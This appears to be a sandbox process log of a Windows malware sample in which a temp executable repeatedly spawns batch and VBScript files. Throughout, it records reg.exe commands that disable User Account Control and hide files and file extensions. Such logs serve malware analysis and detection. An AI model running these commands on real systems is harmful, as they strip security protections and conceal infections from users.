C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NqcYUAQk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\huwwIUUo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\leAcYQEE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VOIMYEQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oUogkwAw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QkYYockM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eyEQYMIc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eQEocQkM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOIsIIwU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AkcsYsAY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LWAskwYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hWwgYkws.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NOEEIQEc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VOIocMYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vswwoQQg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYowYoQk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\coMsUQQQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YOMMEQQM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mkgsgMgI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yYoUwQYQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWoUEcQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IQAoUUcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xikEAsYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\teMcAYUU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vWIccUws.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

